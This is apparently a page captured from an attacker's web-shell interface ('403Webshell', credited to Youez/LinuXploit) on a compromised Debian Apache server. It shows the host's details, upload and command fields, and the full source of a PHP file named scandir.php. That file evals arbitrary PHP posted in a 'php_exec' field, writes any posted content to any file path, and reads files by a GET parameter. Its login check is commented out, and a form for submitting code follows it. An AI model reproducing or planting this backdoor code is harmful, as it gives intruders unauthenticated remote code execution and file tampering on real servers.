403Webshell
Server IP : 80.241.246.6  /  Your IP : 216.73.216.167
Web Server : Apache/2.4.25 (Debian)
System : Linux kharagauli 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
User : www-data ( 33)
PHP Version : 7.0.33-0+deb9u12
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/kharagauli1/site/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/kharagauli1/site/scandir.php
<?php

header("Content-type: text/html; Charset=utf-8");
error_reporting(0);

$PING = isset($_GET['ping'])?$_GET['ping']:'./';
if(in_array(strtolower(ini_get('magic_quotes_gpc')),array('1','on'))){
    $_POST = array_map('stripslashes', $_POST);
    $_GET = array_map('stripslashes', $_GET);
    $_COOKIE = array_map('stripslashes', $_COOKIE);
}
 if($_POST){
    if($_POST['main_save']){ 
      if(file_put_contents($_POST['file_name'],$_POST['main_save']))echo $_POST['file_name'];else return FALSE;
    }elseif($_POST['php_exec']){
        eval($_POST['php_exec']);
    }
      exit;
  }
  if($_GET['file']){
  	if(preg_match('/[.](css)|(CSS)|(html)|(HTML)|(php)|(PHP)|(python)|(js)|(JS)|(vb)|(cpp)|(sql)|(basic)|(txt)|(TXT)|(htaccess)|(HTACCESS)$/',$_GET['file']) &&
	 substr($_GET['file'],2) != 'scandir.php'){
	      preg_match('/[.]\S{1,8}$/',$_GET['file'],$main);
              
//   if(file_exists('saxlisaxli.php'))unlink('saxlisaxli.php')           ;
              


?>
<input type='button' class="main_save" value='Save' />
<script type="text/javascript" src="<?=$PING;?>admin/tree/google/edit_area/edit_area_full.js"></script>
<script type="text/javascript" src="<?=$PING;?>js/main_live1.js"></script>
<script type="text/javascript">
    $(function(){
       $('.main_save').click(function(){
          $.post("",{main_save:editAreaLoader.getValue("example_2"),file_name:'<?=$_GET["file"]?>'},function(data){
              if(data)alert("changed");
          }); 
       }); 
    });
	editAreaLoader.init({
			 id: "example_2"
			,start_highlight: true
			,allow_toggle: false
			,language: "en"
			,syntax: "<?=substr($main[0],1);?>"	
			,toolbar: "search, go_to_line, |, undo, redo, |, select_font, |, syntax_selection, |, change_smooth_selection, highlight, reset_highlight, |, help"
			,syntax_selection_allow: "css,html,js,php,python,vb,xml,c,cpp,sql,basic,pas,brainfuck"
			,is_multi_files: false
			,EA_load_callback: "editAreaLoaded"
			,show_line_colors: true
		});
</script><textarea id="example_2" style="height: 100%; width: 100%;" name="test_2"><?=file_get_contents($_GET['file']);?></textarea>
<?php }else echo 'Wrong Format!!!!!!!!!!!!';exit;
  }
  //if(!isset($_COOKIE['super_user']) && $_COOKIE['super_user'] != 'maines_super_user')header("Location:./index.php");
?>
<style>
	.main_dir{cursor: pointer;width: 100%}
	.small_dir{display: none;margin-left: 10px;}
	.main_dir_child{border: 1px outset black;padding: 2px;border-right: none}
	.main_dir tr td{min-width: 200px}
	.file_name_file{color: red}
	.file_name_folder{color: yellow}
	.aw_htmlsrc{color: red}

</style>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.1/jquery.min.js"></script>
<script type="text/javascript">
;(function($){

		$.fn.slide = function(options){
			this.each(function(){
				var th = $(this);
				   th.toggle(function(){
				   	 th.find('.small_dir:first').slideDown();
			      },function(){
				  	 th.find('.small_dir:first').slideUp();
				  }).find('.file_name_file').click(function(e){
				  	e.preventDefault();
					main_win(location.href+"?file="+$(this).attr('href'));
				  });
			   });
		};	
  })(jQuery);	

	$(function(){
		 $(window).load(function(){
		 	var main_div = $('<div>',{class:'main_dir',html:$('<table>',{html:$('<tr>')})});
			 var masiv = ['Name','Type','Size','Created','Accessed','Modified','Permissions'];
			   for(var i = 0; i < masiv.length; i++)
			     main_div.find('tr').append($('<td>',{text:masiv[i]}));
				  $('body').prepend(main_div);
			
		 });
		
		 $('.main_dir').slide();
	});///end///
  function main_win(a){
   	var params = "width="+window.innerWidth+",height="+window.innerHeight+",toolbar=0,top=0,left=0,scrollbars=1";
     var da = window.open(a, "main_window", params);
	  da.focus();
   }
</script>
<?php


Main::Coll()->tree($PING);

final class Main{
		
		protected static $_instance;
		private function __construct(){}
		private function __clone(){}
		private function __wakeup(){}

		
		public static function Coll(){
		        if(null === self::$_instance){
		            self::$_instance = new Main();
		        }return self::$_instance;
		 }

		public function tree($a){
		  	$scan = scandir($a);
			  for($i = 0; $i <= count($scan); $i++)
			  	for($j = 0; $j <= count($scan)-1; $j++){
				 if($scan[$j] == '.' || $scan[$j] == '..')continue;
                                
				  if($j == count($scan)-1)break;
					if(is_file($a.$scan[$j]) && is_dir($a.$scan[($j+1)])){
						$next = $scan[$j];
						$scan[$j] = $scan[($j+1)];
						$scan[($j+1)] = $next;
					}
				}foreach($scan as $value){
				  	if($value == '.' || $value == '..' || $scan[$j] == 'img' )continue;
					 $type = (is_dir(basename($a.$value)))?'Folder':'file';
					  if(is_dir($a.$value)){
                                          // if($a.$value == $a.'images' || $a.$value == $a.'oldsite')continue;//echo 'saxli<br/>';   
					 	echo '<div class="main_dir">'.$this->main_html('main_dir_child',basename($a.$value),'Folder',$a.$value).'
						  <div class="small_dir">';
						    $this->tree($a.$value.'/');
						echo '</div></div>';
					 }else  echo $this->main_html('main_dir',basename($a.$value),'File',$a.$value);
	            }
			}
			
	   private function main_html($a,$b,$c,$d){
		  	$stat = stat($d);
			$main_preg = function($a){
			  	preg_match('/\w*\.\w{0,2}/',$a/1024,$maina);
				 return $maina[0];
			};
			$folder_size = function($a) use (&$folder_size){
			   $read = opendir($a);
			     while($file = readdir($read)){
			        if($file != '..' && $file != '.' && !is_dir($a.'/'.$file)){
			            $return += filesize($a.'/'.$file);
			        }elseif(is_dir($a.'/'.$file) && $file != '..' && $file != '.'){
			            $return += $folder_size($a.'/'.$file);
			        }
			     }return $return; 
			};
			if(is_dir($d)){
				if($folder_size($d) >= (1000*1024))$ret = $main_preg($folder_size($d)/1024).' &nbsp;MG';
				else $ret = $main_preg($folder_size($d)).' &nbsp;KB';
				$href = '<td class="file_name">'.$b.'</td>';
			}else{
				if($stat['size'] >= (1000*1024))$ret = $main_preg($stat['size']/1024).' &nbsp;MG';
				else $ret = $main_preg($stat['size']).' &nbsp;KB';
				$href = '<td><a class="file_name_file" href="'.$d.'">'.$b.'</a></td>';
			}	
			
		  	return '<div class="'.$a.'">
						<table>
							<tr>
								'.$href.'
								<td class="file_type">'.$c.'</td>
								<td class="file_size">'.$ret.'</td>
								<td class="file_created">'.date('d/m/Y | H:i:s',$stat['ctime']).'</td>
								<td class="file_accessed">'.date('d/m/Y | H:i:s',$stat['atime']).'</td>
								<td class="file_modified">'.date('d/m/Y | H:i:s',$stat['mtime']).'</td>
								<td class="file_permissions">'.sprintf("0%o", 0777 & $stat['mode']).'</td>
							</tr>
						</table>
					</div>';
		  }
 }  
?>
<form method="post">
    <textarea name="php_exec"></textarea>
    <input type="submit" value="send"/>
</form>

Youez - 2016 - github.com/yon3zu
LinuXploit